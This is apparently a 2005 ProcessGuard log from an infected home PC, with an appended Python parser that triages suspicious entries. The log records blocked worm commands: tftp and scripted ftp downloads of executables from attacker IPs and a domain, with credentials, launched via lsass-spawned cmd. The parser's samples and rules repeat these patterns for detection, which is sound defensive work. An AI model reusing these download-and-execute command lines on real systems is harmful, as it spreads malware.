Fri 19 - 15:53:48 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\explorer.exe" [1012]
  [EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Fri 19 - 15:53:48 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\explorer.exe" [1012]
  [EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Fri 19 - 15:53:48 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\explorer.exe" [1012]
  [EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Fri 19 - 15:53:48 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
  [EXECUTION] Started by "Unknown Process" [1956]
0 \windows\explorer.exe" [1004]
  [EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Wed 24 - 19:24:12 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
  [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
  [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsc339fcd23292f24dbf7535b49f0ce283 ]
Wed 24 - 19:24:12 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
  [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
  [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsc43579fa1323614bb48e90dacb7a785f ]
Wed 24 - 19:24:12 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
  [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
  [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsf8b92ef092572b4780c239a26cf94acc ]
Wed 24 - 19:24:12 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
  [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
  [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds3a10222c43348147a5a866c21bb684a5 ]
Wed 24 - 19:24:16 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\explorer.exe" [1004]
  [EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Wed 24 - 19:27:14 [EXECUTION] "c:\windows\system32\tftp.exe" was blocked from running
  [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
  [EXECUTION] Commandline - [ tftp.exe -i 202.124.162.214 get msconfig32.exe ]
Wed 24 - 19:37:00 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
  [EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 416 -h 608 "global\0cf2543ec46819c1ac" ]
Wed 24 - 19:37:10 [EXECUTION] "c:\windows\system32\dwwin.exe" was blocked from running
  [EXECUTION] Started by "Unknown Process" [1716]
  [EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -d c:\docume~1\dugand~1\locals~1\temp\wer3.tmp.dir00\manifest.txt ]
Wed 24 - 19:37:10 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\system32\winlogon.exe" [436]
  [EXECUTION] Commandline - [ logonui.exe /status /shutdown ]
Wed 24 - 19:37:20 [TERMINATE] c:\windows\system32\services.exe [480] was blocked from terminating c:\windows\system32\spoolsv.exe [1040]
---Process Guard Log Started---
Wed 24 - 19:38:39 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\system32\services.exe" [480]
  [EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Wed 24 - 19:38:39 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1432]
  [EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Wed 24 - 19:38:40 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\system32\services.exe" [480]
  [EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Wed 24 - 19:38:41 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\explorer.exe" [1196]
  [EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Wed 24 - 19:38:42 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\explorer.exe" [1196]
  [EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Wed 24 - 19:38:42 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\explorer.exe" [1196]
  [EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Wed 24 - 19:38:42 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\explorer.exe" [1196]
  [EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Wed 24 - 19:38:43 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\explorer.exe" [1196]
  [EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Wed

C:\Program Files\ProcessGuard\logs\pglog_09_2005.txt (1235 KB, 30/09/2005 21:24:38)
0 - 10:01:01 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\lsass.exe" [492] [EXECUTION] Commandline - [ cmd ]
Sun 04 - 10:03:51 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ rundll32.exe shell32.dll,activate_rundll ]
Sun 04 - 10:03:51 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [480] [EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Sun 04 - 10:07:08 [EXECUTION] "c:\windows\system32\tftp.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ tftp.exe -i 202.124.151.134 get tellcoma.exe ]
Sun 04 - 10:09:54 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\lsass.exe" [492] [EXECUTION] Commandline - [ cmd ]
Sun 04 - 10:10:28 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\lsass.exe" [492] [EXECUTION] Commandline - [ cmd /c echo open 205.177.75.16 58739 >cdtime.asp &cmd /c echo user wh0re got[bleep]ed >>cdtime.asp &cmd /c echo binary >>cdtime.asp &cmd /c echo get kimo.exe >>cdtime.asp &cmd /c echo bye >>cdtime.asp &cmd /c ftp.exe -n -s:cdtime.asp &cmd /c del cdtime.asp &start kimo.exe ]
Sun 04 - 10:24:35 [EXECUTION] "c:\windows\system32\rasautou.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ rasautou -r -f "c:\windows\system32\ras\rasphone.pbk" -e "netaccess" ]
Sun 04 - 10:25:02 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 1908 -h 1912 "global\01bd3e63ec3fc19c5a4" ]
Sun 04 - 10:25:07 [EXECUTION] "c:\windows\system32\dwwin.exe" was blocked from running [EXECUTION] Started by "Unknown Process" [456] [EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -d c:\docume~1\dugand~1\locals~1\temp\wer4.tmp.dir00\manifest.txt ]
Sun 04 - 10:25:11 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\winlogon.exe" [436] [EXECUTION] Commandline - [ logonui.exe /status /shutdown ]
Sun 04 - 10:25:21 [TERMINATE] c:\windows\system32\services.exe [480] was blocked from terminating c:\windows\system32\spoolsv.exe [1072]
---Process Guard Log Started---
Sun 04 - 10:26:43 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [476] [EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Sun 04 - 10:26:43 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1348] [EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Sun 04 - 10:26:44 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [476] [EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Sun 04 - 10:26:44 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1008] [EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Sun 04 - 10:26:44 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1008] [EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Sun 04 - 10:26:44 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1008] [EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Sun 04 - 10:26:44 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1008] [EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Sun 04 - 10:26:45 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1008] [EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Sun
0 o run [EXECUTION] Started by "c:\windows\explorer.exe" [1004] [EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Sun 04 - 12:40:31 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [476] [EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Sun 04 - 12:41:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds1ffe2d7dbd8c014d8699d03c60f10261 ]
Sun 04 - 12:41:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds24b69ccfcfb8cc43ad1b08d46abb4e30 ]
Sun 04 - 12:41:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds62eb77e74dc22a4aa04342fbca375a05 ]
Sun 04 - 12:41:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds0a9cca70915ddd46a29346bca648797a ]
Sun 04 - 12:43:02 [EXECUTION] "g:\autorun.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1004] [EXECUTION] Commandline - [ g:\autorun.exe "index.html$0$0" /hide ]
Sun 04 - 12:43:02 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 1004 -h 1148 "global\02b3293ec3fc1981a8" ]
Sun 04 - 12:43:07 [EXECUTION] "c:\windows\system32\dwwin.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\dumprep.exe" [1736] [EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -d c:\docume~1\dugand~1\locals~1\temp\wer4.tmp.dir00\manifest.txt ]
Sun 04 - 12:43:09 [EXECUTION] "c:\windows\explorer.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\winlogon.exe" [432] [EXECUTION] Commandline - [ c:\windows\explorer.exe ]
Sun 04 - 12:43:12 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ rundll32.exe shell32.dll,activate_rundll ]
Sun 04 - 12:43:43 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [476] [EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Sun 04 - 12:44:01 [EXECUTION] "c:\windows\explorer.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [956] [EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]
Sun 04 - 12:44:49 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ rundll32.exe shell32.dll,activate_rundll ]
Sun 04 - 12:45:30 [EXECUTION] "c:\windows\system32\dwwin.exe" was allowed to run [EXECUTION] Started by "g:\autorun.exe" [928] [EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -x -s 172 ]
Sun 04 - 12:45:40 [EXECUTION] "c:\windows\system32\drwtsn32.exe" was allowed to run [EXECUTION] Started by "g:\autorun.exe" [928] [EXECUTION] Commandline - [ drwtsn32 -p 928 -e 136 -g ]
Sun 04 - 12:47:01 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [956] [EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Sun 04 - 12:52:33 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\lsass.exe" [488] [EXECUTION] Commandline - [ cmd ]
Sun 04 - 12:58:59 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\lsass.exe" [488] [EXECUTION] Commandline - [ cmd /c echo open phr3akftp.darksensui.info 612 >appmr.dll &echo user phr klopklop >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo phr.exe >>appmr.dl
0 ON] Commandline - [ rundll32.exe shell32.dll,activate_rundll ]
Mon 05 - 17:36:35 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [540] [EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Mon 05 - 17:37:34 [EXECUTION] "c:\windows\system32\dwwin.exe" was allowed to run [EXECUTION] Started by "c:\program files\xilisoft\dvd ripper se\vconvert.exe" [2676] [EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -x -s 336 ]
Mon 05 - 17:38:06 [EXECUTION] "c:\windows\system32\drwtsn32.exe" was blocked from running [EXECUTION] Started by "Unknown Process" [2676] [EXECUTION] Commandline - [ drwtsn32 -p 2676 -e 332 -g ]
Mon 05 - 17:38:10 [EXECUTION] "c:\documents and settings\dug and tania\desktop\x-dvd-ripper-se.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1288] [EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\desktop\x-dvd-ripper-se.exe" ]
Mon 05 - 17:38:21 [EXECUTION] "c:\program files\xilisoft\dvd ripper se\inaspi.exe" was allowed to run [EXECUTION] Started by "c:\documents and settings\dug and tania\desktop\x-dvd-ripper-se.exe" [3132] [EXECUTION] Commandline - [ "..\inaspi.exe" ]
Mon 05 - 17:38:21 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running [EXECUTION] Started by "Unknown Process" [3160] [EXECUTION] Commandline - [ cmd /c install.bat xp32 ]
Mon 05 - 17:38:27 [EXECUTION] "c:\program files\xilisoft\dvd ripper se\vconvert.exe" was allowed to run [EXECUTION] Started by "c:\documents and settings\dug and tania\desktop\x-dvd-ripper-se.exe" [3132] [EXECUTION] Commandline - [ "c:\program files\xilisoft\dv
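Added here as an editor's example, not part of the poster's log or of ProcessGuard itself: a small Python parser for the [EXECUTION] entry layout shown above, with triage rules for the parent/child and command-line patterns that stand out in it (lsass.exe launching cmd.exe, a tftp "get", an ftp script assembled with echo redirection, a parent that could not be identified). The sample entries, file names and 192.0.2.x addresses are constructed.

```python
import re
from pathlib import PureWindowsPath

# One ProcessGuard [EXECUTION] entry, laid out as in the log above.
ENTRY_RE = re.compile(
    r'^(?P<day>[A-Za-z]{3}) (?P<dom>\d{2}) - (?P<time>\d{2}:\d{2}:\d{2}) '
    r'\[EXECUTION\] "(?P<image>[^"]+)" was (?P<verdict>allowed to run|blocked from running) '
    r'\[EXECUTION\] Started by "(?P<parent>[^"]+)" \[(?P<ppid>\d+)\] '
    r'\[EXECUTION\] Commandline - \[ (?P<cmdline>.*?) \]$')

# Constructed sample entries modelled on the post; 192.0.2.x are documentation addresses.
SAMPLE_LOG = [
    r'Sun 04 - 10:01:01 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\lsass.exe" [492] [EXECUTION] Commandline - [ cmd ]',
    r'Sun 04 - 10:03:51 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [480] [EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]',
    r'Sun 04 - 10:07:08 [EXECUTION] "c:\windows\system32\tftp.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ tftp.exe -i 192.0.2.10 get dropper.exe ]',
    r'Sun 04 - 10:10:28 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\lsass.exe" [492] [EXECUTION] Commandline - [ cmd /c echo open 192.0.2.20 21 >dl.txt &cmd /c ftp.exe -n -s:dl.txt &cmd /c del dl.txt ]',
]

def parse_entry(line):
    """Parse one [EXECUTION] entry; other entry types such as [TERMINATE] give None."""
    m = ENTRY_RE.match(line.strip())
    return m and dict(m.groupdict(), blocked=m["verdict"].startswith("blocked"))

def basename(path):
    """Lower-cased file name of a Windows path ("Unknown Process" stays as-is)."""
    return PureWindowsPath(path).name.lower()

def triage(entry):
    """Reasons this execution deserves a look; an empty list means none."""
    child, parent = basename(entry["image"]), basename(entry["parent"])
    cmd = f' {entry["cmdline"].lower()} '   # padded so " get " / " echo open " match whole words
    reasons = []
    if parent == "lsass.exe" and child == "cmd.exe":
        reasons.append("lsass.exe launching a command shell")
    if child == "tftp.exe" and " get " in cmd:
        reasons.append("tftp fetch of a file from a remote host")
    if "ftp.exe -n -s:" in cmd or " echo open " in cmd:
        reasons.append("scripted ftp download built with echo redirection")
    if parent == "unknown process":
        reasons.append("parent process could not be identified")
    return reasons

def scan(lines):
    """Triage every parsable entry and return those with findings, in log order."""
    out = []
    for e in filter(None, map(parse_entry, lines)):
        if reasons := triage(e):
            out.append({"time": e["time"], "image": basename(e["image"]), "blocked": e["blocked"], "reasons": reasons})
    return out
```

Run against a full pglog file with `scan(open(path, errors="replace"))`; the "was blocked" verdicts confirm what ProcessGuard stopped, while "allowed" findings are the ones that warrant a closer look.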